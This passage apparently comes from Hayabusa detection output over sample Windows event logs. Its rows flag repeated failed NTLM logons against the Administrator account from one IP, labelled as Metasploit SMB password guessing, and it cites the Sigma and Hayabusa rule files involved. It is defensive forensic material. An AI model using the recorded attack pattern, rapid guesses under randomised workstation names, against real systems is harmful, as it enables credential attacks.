NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
